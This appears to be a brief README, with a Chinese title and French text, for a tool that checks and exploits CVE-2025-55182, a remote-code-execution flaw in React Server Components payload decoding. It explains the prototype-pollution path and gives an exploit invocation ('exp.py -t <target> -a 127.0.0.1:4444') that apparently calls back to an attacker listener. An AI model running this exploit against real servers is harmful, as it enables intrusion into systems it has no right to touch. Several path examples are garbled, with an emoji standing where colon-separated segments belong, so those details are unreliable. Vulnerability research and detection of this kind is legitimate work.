
CVE-2025-55182 检测方式和攻击利用
Outil de vérification personnel pour vérifier la vulnérabilité CVE-2025-55182
React Server Components présente un défaut de résolution de chemin lors du décodage des payloads envoyés aux points de terminaison des fonctions serveur. Il utilise le deux-points pour séparer les propriétés d'objet et réaliser un accès imbriqué (par exemple, $1🅰️b correspond à {}.a.b de {"a":{"b":"foo"}}), mais ne vérifie pas l'existence des propriétés. Lorsque $1🅰️a est passé, un accès invalide à {}.a.a est déclenché, provoquant une erreur 500 côté serveur ; un attaquant peut construire un payload spécial pour réaliser une pollution du prototype et une injection de code, permettant un RCE.
python3 exp.py -t http://127.0.0.1:8080/ -a 127.0.0.1:4444
CVE-2025-55182-Check.sh [-h] [-f <path>] [-a]
Cet outil est destiné uniquement à la recherche en sécurité, ne l'utilisez pas à des fins illégales.